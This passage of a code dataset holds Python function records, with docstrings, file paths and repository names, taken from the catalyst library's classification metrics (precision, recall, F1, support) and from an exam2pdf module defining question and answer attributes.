per_class: per-class metrics, array of shape (4, self.num_classes) of precision, recall, f1 and support metrics micro: micro averaged metrics, array of shape (self.num_classes) of precision, recall, f1 and support metrics macro: macro averaged metrics, array of shape (self.num_classes) of precision, recall, f1 and support metrics weighted: weighted averaged metrics, array of shape (self.num_classes) of precision, recall, f1 and support metrics Returns: dict of key-value metrics<|endoftext|>
8209d32ab3e855d98fdd767af7583618c6c4f4fea7c403afe5ed98c5e0443f5e
def update(self, outputs: torch.Tensor, targets: torch.Tensor) -> Tuple[(Any, Any, Any, Any)]:
    """
    Update statistics and return intermediate metrics results.

    Args:
        outputs: prediction values
        targets: true answers

    Returns:
        tuple of metrics intermediate results with per-class, micro, macro and
        weighted averaging
    """
    # Fold the batch into the base-class counters; tn is unused by the
    # aggregation below but is part of the base update's return contract.
    tn, fp, fn, tp, support = super().update(outputs=outputs, targets=targets)
    # Aggregate this batch's counters into the four averaging views.
    return get_aggregated_metrics(
        tp=tp, fp=fp, fn=fn, support=support, zero_division=self.zero_division
    )
Update statistics and return intermediate metrics results Args: outputs: prediction values targets: true answers Returns: tuple of metrics intermediate results with per-class, micro, macro and weighted averaging
catalyst/metrics/_classification.py
update
ifixdocs/catalyst
1
python
def update(self, outputs: torch.Tensor, targets: torch.Tensor) -> Tuple[(Any, Any, Any, Any)]: '\n Update statistics and return intermediate metrics results\n\n Args:\n outputs: prediction values\n targets: true answers\n\n Returns:\n tuple of metrics intermediate results with per-class, micro, macro and\n weighted averaging\n ' (tn, fp, fn, tp, support) = super().update(outputs=outputs, targets=targets) (per_class, micro, macro, weighted) = get_aggregated_metrics(tp=tp, fp=fp, fn=fn, support=support, zero_division=self.zero_division) return (per_class, micro, macro, weighted)
def update(self, outputs: torch.Tensor, targets: torch.Tensor) -> Tuple[(Any, Any, Any, Any)]: '\n Update statistics and return intermediate metrics results\n\n Args:\n outputs: prediction values\n targets: true answers\n\n Returns:\n tuple of metrics intermediate results with per-class, micro, macro and\n weighted averaging\n ' (tn, fp, fn, tp, support) = super().update(outputs=outputs, targets=targets) (per_class, micro, macro, weighted) = get_aggregated_metrics(tp=tp, fp=fp, fn=fn, support=support, zero_division=self.zero_division) return (per_class, micro, macro, weighted)<|docstring|>Update statistics and return intermediate metrics results Args: outputs: prediction values targets: true answers Returns: tuple of metrics intermediate results with per-class, micro, macro and weighted averaging<|endoftext|>
45cbbd238a0fcc120819d600ce1fd4065caa6d8773e83453f683db7a5806091c
def update_key_value(self, outputs: torch.Tensor, targets: torch.Tensor) -> Dict[(str, float)]: '\n Update statistics and return intermediate metrics results\n\n Args:\n outputs: prediction values\n targets: true answers\n\n Returns:\n dict of metrics intermediate results\n ' (per_class, micro, macro, weighted) = self.update(outputs=outputs, targets=targets) metrics = self._convert_metrics_to_kv(per_class=per_class, micro=micro, macro=macro, weighted=weighted) return metrics
Update statistics and return intermediate metrics results Args: outputs: prediction values targets: true answers Returns: dict of metrics intermediate results
catalyst/metrics/_classification.py
update_key_value
ifixdocs/catalyst
1
python
def update_key_value(self, outputs: torch.Tensor, targets: torch.Tensor) -> Dict[(str, float)]: '\n Update statistics and return intermediate metrics results\n\n Args:\n outputs: prediction values\n targets: true answers\n\n Returns:\n dict of metrics intermediate results\n ' (per_class, micro, macro, weighted) = self.update(outputs=outputs, targets=targets) metrics = self._convert_metrics_to_kv(per_class=per_class, micro=micro, macro=macro, weighted=weighted) return metrics
def update_key_value(self, outputs: torch.Tensor, targets: torch.Tensor) -> Dict[(str, float)]: '\n Update statistics and return intermediate metrics results\n\n Args:\n outputs: prediction values\n targets: true answers\n\n Returns:\n dict of metrics intermediate results\n ' (per_class, micro, macro, weighted) = self.update(outputs=outputs, targets=targets) metrics = self._convert_metrics_to_kv(per_class=per_class, micro=micro, macro=macro, weighted=weighted) return metrics<|docstring|>Update statistics and return intermediate metrics results Args: outputs: prediction values targets: true answers Returns: dict of metrics intermediate results<|endoftext|>
f351b880c3f9b3d9ebd767bf5953ffedb9868a2ff591bffbb0f01e3b03524e26
def compute(self) -> Any: '\n Compute precision, recall, f1 score and support.\n Compute micro, macro and weighted average for the metrics.\n\n Returns:\n list of aggregated metrics: per-class, micro, macro and weighted averaging of\n precision, recall, f1 score and support metrics\n ' (per_class, micro, macro, weighted) = get_aggregated_metrics(tp=self.statistics['tp'], fp=self.statistics['fp'], fn=self.statistics['fn'], support=self.statistics['support'], zero_division=self.zero_division) return (per_class, micro, macro, weighted)
Compute precision, recall, f1 score and support. Compute micro, macro and weighted average for the metrics. Returns: list of aggregated metrics: per-class, micro, macro and weighted averaging of precision, recall, f1 score and support metrics
catalyst/metrics/_classification.py
compute
ifixdocs/catalyst
1
python
def compute(self) -> Any: '\n Compute precision, recall, f1 score and support.\n Compute micro, macro and weighted average for the metrics.\n\n Returns:\n list of aggregated metrics: per-class, micro, macro and weighted averaging of\n precision, recall, f1 score and support metrics\n ' (per_class, micro, macro, weighted) = get_aggregated_metrics(tp=self.statistics['tp'], fp=self.statistics['fp'], fn=self.statistics['fn'], support=self.statistics['support'], zero_division=self.zero_division) return (per_class, micro, macro, weighted)
def compute(self) -> Any: '\n Compute precision, recall, f1 score and support.\n Compute micro, macro and weighted average for the metrics.\n\n Returns:\n list of aggregated metrics: per-class, micro, macro and weighted averaging of\n precision, recall, f1 score and support metrics\n ' (per_class, micro, macro, weighted) = get_aggregated_metrics(tp=self.statistics['tp'], fp=self.statistics['fp'], fn=self.statistics['fn'], support=self.statistics['support'], zero_division=self.zero_division) return (per_class, micro, macro, weighted)<|docstring|>Compute precision, recall, f1 score and support. Compute micro, macro and weighted average for the metrics. Returns: list of aggregated metrics: per-class, micro, macro and weighted averaging of precision, recall, f1 score and support metrics<|endoftext|>
6a27288a217b8ea0edd136f1a86b06b7c397acf33c148e7033f92e42ca0bfe91
def compute_key_value(self) -> Dict[(str, float)]: '\n Compute precision, recall, f1 score and support.\n Compute micro, macro and weighted average for the metrics.\n\n Returns:\n dict of metrics\n ' if self._is_ddp: for key in self.statistics: value: List[np.ndarray] = all_gather(self.statistics[key]) value: np.ndarray = np.sum(np.vstack(value), axis=0) self.statistics[key] = value (per_class, micro, macro, weighted) = self.compute() metrics = self._convert_metrics_to_kv(per_class=per_class, micro=micro, macro=macro, weighted=weighted) return metrics
Compute precision, recall, f1 score and support. Compute micro, macro and weighted average for the metrics. Returns: dict of metrics
catalyst/metrics/_classification.py
compute_key_value
ifixdocs/catalyst
1
python
def compute_key_value(self) -> Dict[(str, float)]: '\n Compute precision, recall, f1 score and support.\n Compute micro, macro and weighted average for the metrics.\n\n Returns:\n dict of metrics\n ' if self._is_ddp: for key in self.statistics: value: List[np.ndarray] = all_gather(self.statistics[key]) value: np.ndarray = np.sum(np.vstack(value), axis=0) self.statistics[key] = value (per_class, micro, macro, weighted) = self.compute() metrics = self._convert_metrics_to_kv(per_class=per_class, micro=micro, macro=macro, weighted=weighted) return metrics
def compute_key_value(self) -> Dict[(str, float)]: '\n Compute precision, recall, f1 score and support.\n Compute micro, macro and weighted average for the metrics.\n\n Returns:\n dict of metrics\n ' if self._is_ddp: for key in self.statistics: value: List[np.ndarray] = all_gather(self.statistics[key]) value: np.ndarray = np.sum(np.vstack(value), axis=0) self.statistics[key] = value (per_class, micro, macro, weighted) = self.compute() metrics = self._convert_metrics_to_kv(per_class=per_class, micro=micro, macro=macro, weighted=weighted) return metrics<|docstring|>Compute precision, recall, f1 score and support. Compute micro, macro and weighted average for the metrics. Returns: dict of metrics<|endoftext|>
bf9c8bf9b9841be8372d036cbdbfb3ace7e29522e69aff3ef0add30a152c064e
def __init__(self, zero_division: int=0, compute_on_call: bool=True, prefix: Optional[str]=None, suffix: Optional[str]=None): 'Init BinaryPrecisionRecallF1SupportMetric instance' super().__init__(num_classes=2, mode='binary', compute_on_call=compute_on_call, prefix=prefix, suffix=suffix) self.zero_division = zero_division self.reset()
Init BinaryPrecisionRecallF1SupportMetric instance
catalyst/metrics/_classification.py
__init__
ifixdocs/catalyst
1
python
def __init__(self, zero_division: int=0, compute_on_call: bool=True, prefix: Optional[str]=None, suffix: Optional[str]=None): super().__init__(num_classes=2, mode='binary', compute_on_call=compute_on_call, prefix=prefix, suffix=suffix) self.zero_division = zero_division self.reset()
def __init__(self, zero_division: int=0, compute_on_call: bool=True, prefix: Optional[str]=None, suffix: Optional[str]=None): super().__init__(num_classes=2, mode='binary', compute_on_call=compute_on_call, prefix=prefix, suffix=suffix) self.zero_division = zero_division self.reset()<|docstring|>Init BinaryPrecisionRecallF1SupportMetric instance<|endoftext|>
e95838b898674e31c9024ac7642db542932474c5973947e89ac6e81e0b41c653
@staticmethod def _convert_metrics_to_kv(precision_value: float, recall_value: float, f1_value: float) -> Dict[(str, float)]: '\n Convert list of metrics to key-value\n\n Args:\n precision_value: precision value\n recall_value: recall value\n f1_value: f1 value\n\n Returns:\n dict of metrics\n ' kv_metrics = {'precision': precision_value, 'recall': recall_value, 'f1': f1_value} return kv_metrics
Convert list of metrics to key-value Args: precision_value: precision value recall_value: recall value f1_value: f1 value Returns: dict of metrics
catalyst/metrics/_classification.py
_convert_metrics_to_kv
ifixdocs/catalyst
1
python
@staticmethod def _convert_metrics_to_kv(precision_value: float, recall_value: float, f1_value: float) -> Dict[(str, float)]: '\n Convert list of metrics to key-value\n\n Args:\n precision_value: precision value\n recall_value: recall value\n f1_value: f1 value\n\n Returns:\n dict of metrics\n ' kv_metrics = {'precision': precision_value, 'recall': recall_value, 'f1': f1_value} return kv_metrics
@staticmethod def _convert_metrics_to_kv(precision_value: float, recall_value: float, f1_value: float) -> Dict[(str, float)]: '\n Convert list of metrics to key-value\n\n Args:\n precision_value: precision value\n recall_value: recall value\n f1_value: f1 value\n\n Returns:\n dict of metrics\n ' kv_metrics = {'precision': precision_value, 'recall': recall_value, 'f1': f1_value} return kv_metrics<|docstring|>Convert list of metrics to key-value Args: precision_value: precision value recall_value: recall value f1_value: f1 value Returns: dict of metrics<|endoftext|>
5b8c09b9208671c395e769a9f6e11cac04ee230656377153b7082ce23c574928
def reset(self) -> None: 'Reset all the statistics and metrics fields.' self.statistics = defaultdict(float)
Reset all the statistics and metrics fields.
catalyst/metrics/_classification.py
reset
ifixdocs/catalyst
1
python
def reset(self) -> None: self.statistics = defaultdict(float)
def reset(self) -> None: self.statistics = defaultdict(float)<|docstring|>Reset all the statistics and metrics fields.<|endoftext|>
ef102ef01d74ffa3a113eee52801c1a257a76a0b53ac6b78c3fa3729bf17432d
def update(self, outputs: torch.Tensor, targets: torch.Tensor) -> Tuple[(float, float, float)]: '\n Update statistics and return metrics intermediate results\n\n Args:\n outputs: predicted labels\n targets: target labels\n\n Returns:\n tuple of intermediate metrics: precision, recall, f1 score\n ' (tn, fp, fn, tp, support) = super().update(outputs=outputs, targets=targets) (precision_value, recall_value, f1_value) = get_binary_metrics(tp=tp, fp=fp, fn=fn, zero_division=self.zero_division) return (precision_value, recall_value, f1_value)
Update statistics and return metrics intermediate results Args: outputs: predicted labels targets: target labels Returns: tuple of intermediate metrics: precision, recall, f1 score
catalyst/metrics/_classification.py
update
ifixdocs/catalyst
1
python
def update(self, outputs: torch.Tensor, targets: torch.Tensor) -> Tuple[(float, float, float)]: '\n Update statistics and return metrics intermediate results\n\n Args:\n outputs: predicted labels\n targets: target labels\n\n Returns:\n tuple of intermediate metrics: precision, recall, f1 score\n ' (tn, fp, fn, tp, support) = super().update(outputs=outputs, targets=targets) (precision_value, recall_value, f1_value) = get_binary_metrics(tp=tp, fp=fp, fn=fn, zero_division=self.zero_division) return (precision_value, recall_value, f1_value)
def update(self, outputs: torch.Tensor, targets: torch.Tensor) -> Tuple[(float, float, float)]: '\n Update statistics and return metrics intermediate results\n\n Args:\n outputs: predicted labels\n targets: target labels\n\n Returns:\n tuple of intermediate metrics: precision, recall, f1 score\n ' (tn, fp, fn, tp, support) = super().update(outputs=outputs, targets=targets) (precision_value, recall_value, f1_value) = get_binary_metrics(tp=tp, fp=fp, fn=fn, zero_division=self.zero_division) return (precision_value, recall_value, f1_value)<|docstring|>Update statistics and return metrics intermediate results Args: outputs: predicted labels targets: target labels Returns: tuple of intermediate metrics: precision, recall, f1 score<|endoftext|>
ee4685f7db931f401aa3a41ffb42955cc36c57a58ab660648c6c998ec42354d9
def update_key_value(self, outputs: torch.Tensor, targets: torch.Tensor) -> Dict[(str, float)]: '\n Update statistics and return metrics intermediate results\n\n Args:\n outputs: predicted labels\n targets: target labels\n\n Returns:\n dict of intermediate metrics\n ' (precision_value, recall_value, f1_value) = self.update(outputs=outputs, targets=targets) kv_metrics = self._convert_metrics_to_kv(precision_value=precision_value, recall_value=recall_value, f1_value=f1_value) return kv_metrics
Update statistics and return metrics intermediate results Args: outputs: predicted labels targets: target labels Returns: dict of intermediate metrics
catalyst/metrics/_classification.py
update_key_value
ifixdocs/catalyst
1
python
def update_key_value(self, outputs: torch.Tensor, targets: torch.Tensor) -> Dict[(str, float)]: '\n Update statistics and return metrics intermediate results\n\n Args:\n outputs: predicted labels\n targets: target labels\n\n Returns:\n dict of intermediate metrics\n ' (precision_value, recall_value, f1_value) = self.update(outputs=outputs, targets=targets) kv_metrics = self._convert_metrics_to_kv(precision_value=precision_value, recall_value=recall_value, f1_value=f1_value) return kv_metrics
def update_key_value(self, outputs: torch.Tensor, targets: torch.Tensor) -> Dict[(str, float)]: '\n Update statistics and return metrics intermediate results\n\n Args:\n outputs: predicted labels\n targets: target labels\n\n Returns:\n dict of intermediate metrics\n ' (precision_value, recall_value, f1_value) = self.update(outputs=outputs, targets=targets) kv_metrics = self._convert_metrics_to_kv(precision_value=precision_value, recall_value=recall_value, f1_value=f1_value) return kv_metrics<|docstring|>Update statistics and return metrics intermediate results Args: outputs: predicted labels targets: target labels Returns: dict of intermediate metrics<|endoftext|>
1ff2a55e956de53f2978964bf26f17141c5b1294bbf13b6cfcac49af8901d242
def compute(self) -> Tuple[(float, float, float)]: '\n Compute metrics with accumulated statistics\n\n Returns:\n tuple of metrics: precision, recall, f1 score\n ' if self._is_ddp: for key in self.statistics: value: List[float] = all_gather(self.statistics[key]) value: float = sum(value) self.statistics[key] = value (precision_value, recall_value, f1_value) = get_binary_metrics(tp=self.statistics['tp'], fp=self.statistics['fp'], fn=self.statistics['fn'], zero_division=self.zero_division) return (precision_value, recall_value, f1_value)
Compute metrics with accumulated statistics Returns: tuple of metrics: precision, recall, f1 score
catalyst/metrics/_classification.py
compute
ifixdocs/catalyst
1
python
def compute(self) -> Tuple[(float, float, float)]: '\n Compute metrics with accumulated statistics\n\n Returns:\n tuple of metrics: precision, recall, f1 score\n ' if self._is_ddp: for key in self.statistics: value: List[float] = all_gather(self.statistics[key]) value: float = sum(value) self.statistics[key] = value (precision_value, recall_value, f1_value) = get_binary_metrics(tp=self.statistics['tp'], fp=self.statistics['fp'], fn=self.statistics['fn'], zero_division=self.zero_division) return (precision_value, recall_value, f1_value)
def compute(self) -> Tuple[(float, float, float)]: '\n Compute metrics with accumulated statistics\n\n Returns:\n tuple of metrics: precision, recall, f1 score\n ' if self._is_ddp: for key in self.statistics: value: List[float] = all_gather(self.statistics[key]) value: float = sum(value) self.statistics[key] = value (precision_value, recall_value, f1_value) = get_binary_metrics(tp=self.statistics['tp'], fp=self.statistics['fp'], fn=self.statistics['fn'], zero_division=self.zero_division) return (precision_value, recall_value, f1_value)<|docstring|>Compute metrics with accumulated statistics Returns: tuple of metrics: precision, recall, f1 score<|endoftext|>
5a56b377f6f1414df4f74e596ca7b9a8bd0ad57011c1a71644aaf3751a982c8a
def compute_key_value(self) -> Dict[(str, float)]: '\n Compute metrics with all accumulated statistics\n\n Returns:\n dict of metrics\n ' (precision_value, recall_value, f1_value) = self.compute() kv_metrics = self._convert_metrics_to_kv(precision_value=precision_value, recall_value=recall_value, f1_value=f1_value) return kv_metrics
Compute metrics with all accumulated statistics Returns: dict of metrics
catalyst/metrics/_classification.py
compute_key_value
ifixdocs/catalyst
1
python
def compute_key_value(self) -> Dict[(str, float)]: '\n Compute metrics with all accumulated statistics\n\n Returns:\n dict of metrics\n ' (precision_value, recall_value, f1_value) = self.compute() kv_metrics = self._convert_metrics_to_kv(precision_value=precision_value, recall_value=recall_value, f1_value=f1_value) return kv_metrics
def compute_key_value(self) -> Dict[(str, float)]: '\n Compute metrics with all accumulated statistics\n\n Returns:\n dict of metrics\n ' (precision_value, recall_value, f1_value) = self.compute() kv_metrics = self._convert_metrics_to_kv(precision_value=precision_value, recall_value=recall_value, f1_value=f1_value) return kv_metrics<|docstring|>Compute metrics with all accumulated statistics Returns: dict of metrics<|endoftext|>
3f16057e7f825cfba763990b30d799c18fbbe402ad4a5c6a013b03f8ad5224c2
def __init__(self, num_classes: int=None, zero_division: int=0, compute_on_call: bool=True, prefix: Optional[str]=None, suffix: Optional[str]=None): 'Init MultiClassPrecisionRecallF1SupportMetric instance' super().__init__(compute_on_call=compute_on_call, prefix=prefix, suffix=suffix, num_classes=num_classes, zero_division=zero_division, mode='multiclass')
Init MultiClassPrecisionRecallF1SupportMetric instance
catalyst/metrics/_classification.py
__init__
ifixdocs/catalyst
1
python
def __init__(self, num_classes: int=None, zero_division: int=0, compute_on_call: bool=True, prefix: Optional[str]=None, suffix: Optional[str]=None): super().__init__(compute_on_call=compute_on_call, prefix=prefix, suffix=suffix, num_classes=num_classes, zero_division=zero_division, mode='multiclass')
def __init__(self, num_classes: int=None, zero_division: int=0, compute_on_call: bool=True, prefix: Optional[str]=None, suffix: Optional[str]=None): super().__init__(compute_on_call=compute_on_call, prefix=prefix, suffix=suffix, num_classes=num_classes, zero_division=zero_division, mode='multiclass')<|docstring|>Init MultiClassPrecisionRecallF1SupportMetric instance<|endoftext|>
85128887433d9132c1ee931685fdba10f0e407a229fb82bbf02f557b56c156b9
def __init__(self, num_classes: int=None, zero_division: int=0, compute_on_call: bool=True, prefix: Optional[str]=None, suffix: Optional[str]=None): 'Init MultiLabelPrecisionRecallF1SupportMetric instance' super().__init__(compute_on_call=compute_on_call, prefix=prefix, suffix=suffix, num_classes=num_classes, zero_division=zero_division, mode='multilabel')
Init MultiLabelPrecisionRecallF1SupportMetric instance
catalyst/metrics/_classification.py
__init__
ifixdocs/catalyst
1
python
def __init__(self, num_classes: int=None, zero_division: int=0, compute_on_call: bool=True, prefix: Optional[str]=None, suffix: Optional[str]=None): super().__init__(compute_on_call=compute_on_call, prefix=prefix, suffix=suffix, num_classes=num_classes, zero_division=zero_division, mode='multilabel')
def __init__(self, num_classes: int=None, zero_division: int=0, compute_on_call: bool=True, prefix: Optional[str]=None, suffix: Optional[str]=None): super().__init__(compute_on_call=compute_on_call, prefix=prefix, suffix=suffix, num_classes=num_classes, zero_division=zero_division, mode='multilabel')<|docstring|>Init MultiLabelPrecisionRecallF1SupportMetric instance<|endoftext|>
3add48f507c5f5c94709143dc9aaf3fedbcb927df2745470e6ae7cc148740d25
@text.setter def text(self, text: str) -> None: 'Text is the answer.\n ' if isinstance(text, str): self._text = text else: raise TypeError(f'{text} is not a string')
Text is the answer.
exam2pdf/question.py
text
agossino/exam2pdf
0
python
@text.setter def text(self, text: str) -> None: '\n ' if isinstance(text, str): self._text = text else: raise TypeError(f'{text} is not a string')
@text.setter def text(self, text: str) -> None: '\n ' if isinstance(text, str): self._text = text else: raise TypeError(f'{text} is not a string')<|docstring|>Text is the answer.<|endoftext|>
e5eed5240186032b28b730f178a27f82e97a24878b25545e3cc1367384f5d86d
@property def image(self) -> Path: 'Image associated with the answer: it can help or\n can be the answer.\n ' return self._image
Image associated with the answer: it can help or can be the answer.
exam2pdf/question.py
image
agossino/exam2pdf
0
python
@property def image(self) -> Path: 'Image associated with the answer: it can help or\n can be the answer.\n ' return self._image
@property def image(self) -> Path: 'Image associated with the answer: it can help or\n can be the answer.\n ' return self._image<|docstring|>Image associated with the answer: it can help or can be the answer.<|endoftext|>
da687c250c8b7abd85eb7c9de053ca2ae11326c112f587114bd03b18a1f27d9b
@property def attr_load_sequence(self) -> Tuple[(str, ...)]: 'Answer can be set by load_sequentially method: this attribute\n return the order the attribute are set' return self._attr_load_sequence
Answer can be set by load_sequentially method: this attribute return the order the attribute are set
exam2pdf/question.py
attr_load_sequence
agossino/exam2pdf
0
python
@property def attr_load_sequence(self) -> Tuple[(str, ...)]: 'Answer can be set by load_sequentially method: this attribute\n return the order the attribute are set' return self._attr_load_sequence
@property def attr_load_sequence(self) -> Tuple[(str, ...)]: 'Answer can be set by load_sequentially method: this attribute\n return the order the attribute are set' return self._attr_load_sequence<|docstring|>Answer can be set by load_sequentially method: this attribute return the order the attribute are set<|endoftext|>
09883976c625c883ac4b1ab07dcd1fb9f68b430591682849f8336de5183851d8
def load_sequentially(self, iterator: Iterator[Any]) -> None: 'Load all the attribute sequentially from iterator. Return\n when all attribute are filled. If the elements in the iterator\n are less then the attributes, StopIteration is not caught.\n ' attribute_iterator: Iterator[str] = iter(self.attr_load_sequence) caster_iterator: Iterator[CasterType] = iter(self._type_caster_sequence) attribute: Optional[str] = next(attribute_iterator, None) caster: Optional[CasterType] = next(caster_iterator, None) while ((attribute is not None) and (caster is not None)): setattr(self, attribute, caster(next(iterator))) attribute = next(attribute_iterator, None) caster = next(caster_iterator, None)
Load all the attribute sequentially from iterator. Return when all attribute are filled. If the elements in the iterator are less then the attributes, StopIteration is not caught.
exam2pdf/question.py
load_sequentially
agossino/exam2pdf
0
python
def load_sequentially(self, iterator: Iterator[Any]) -> None: 'Load all the attribute sequentially from iterator. Return\n when all attribute are filled. If the elements in the iterator\n are less then the attributes, StopIteration is not caught.\n ' attribute_iterator: Iterator[str] = iter(self.attr_load_sequence) caster_iterator: Iterator[CasterType] = iter(self._type_caster_sequence) attribute: Optional[str] = next(attribute_iterator, None) caster: Optional[CasterType] = next(caster_iterator, None) while ((attribute is not None) and (caster is not None)): setattr(self, attribute, caster(next(iterator))) attribute = next(attribute_iterator, None) caster = next(caster_iterator, None)
def load_sequentially(self, iterator: Iterator[Any]) -> None: 'Load all the attribute sequentially from iterator. Return\n when all attribute are filled. If the elements in the iterator\n are less then the attributes, StopIteration is not caught.\n ' attribute_iterator: Iterator[str] = iter(self.attr_load_sequence) caster_iterator: Iterator[CasterType] = iter(self._type_caster_sequence) attribute: Optional[str] = next(attribute_iterator, None) caster: Optional[CasterType] = next(caster_iterator, None) while ((attribute is not None) and (caster is not None)): setattr(self, attribute, caster(next(iterator))) attribute = next(attribute_iterator, None) caster = next(caster_iterator, None)<|docstring|>Load all the attribute sequentially from iterator. Return when all attribute are filled. If the elements in the iterator are less then the attributes, StopIteration is not caught.<|endoftext|>
317db48a59c2f1e23c87f90d43be6650276ea201800a017c125f6dfd0c6f82ab
@text.setter def text(self, text: str) -> None: 'Text is the question.\n ' if isinstance(text, str): self._text = text else: raise TypeError(f'{text} in not a string')
Text is the question.
exam2pdf/question.py
text
agossino/exam2pdf
0
python
@text.setter def text(self, text: str) -> None: '\n ' if isinstance(text, str): self._text = text else: raise TypeError(f'{text} in not a string')
@text.setter def text(self, text: str) -> None: '\n ' if isinstance(text, str): self._text = text else: raise TypeError(f'{text} in not a string')<|docstring|>Text is the question.<|endoftext|>
353f7ac3d6e0a1046fde3b4380a1dc3aa965ba5e657e6a064edc6cadb6972084
@image.setter def image(self, file_path: Path) -> None: 'Image cha help or can be the question itself.\n ' if isinstance(file_path, Path): self._image = file_path else: raise TypeError(f'{file_path} is not a Path')
Image cha help or can be the question itself.
exam2pdf/question.py
image
agossino/exam2pdf
0
python
@image.setter def image(self, file_path: Path) -> None: '\n ' if isinstance(file_path, Path): self._image = file_path else: raise TypeError(f'{file_path} is not a Path')
@image.setter def image(self, file_path: Path) -> None: '\n ' if isinstance(file_path, Path): self._image = file_path else: raise TypeError(f'{file_path} is not a Path')<|docstring|>Image cha help or can be the question itself.<|endoftext|>
b62e6276b042260623c105cb135c14dd4bc9c584708d38b402c62169d21491c2
@subject.setter def subject(self, name: str) -> None: 'The subject of the question.\n ' if isinstance(name, str): self._subject = name else: raise TypeError(f'{name} is not a string')
The subject of the question.
exam2pdf/question.py
subject
agossino/exam2pdf
0
python
@subject.setter def subject(self, name: str) -> None: '\n ' if isinstance(name, str): self._subject = name else: raise TypeError(f'{name} is not a string')
@subject.setter def subject(self, name: str) -> None: '\n ' if isinstance(name, str): self._subject = name else: raise TypeError(f'{name} is not a string')<|docstring|>The subject of the question.<|endoftext|>
01547ab385cd6d809e68ccc2a32fd582d8e8f373891786c3f611f9660bac3023
@level.setter def level(self, value: int) -> None: 'The level of difficulty.\n ' if isinstance(value, int): self._level = value else: raise TypeError(f'{value} is not an int')
The level of difficulty.
exam2pdf/question.py
level
agossino/exam2pdf
0
python
@level.setter def level(self, value: int) -> None: '\n ' if isinstance(value, int): self._level = value else: raise TypeError(f'{value} is not an int')
@level.setter def level(self, value: int) -> None: '\n ' if isinstance(value, int): self._level = value else: raise TypeError(f'{value} is not an int')<|docstring|>The level of difficulty.<|endoftext|>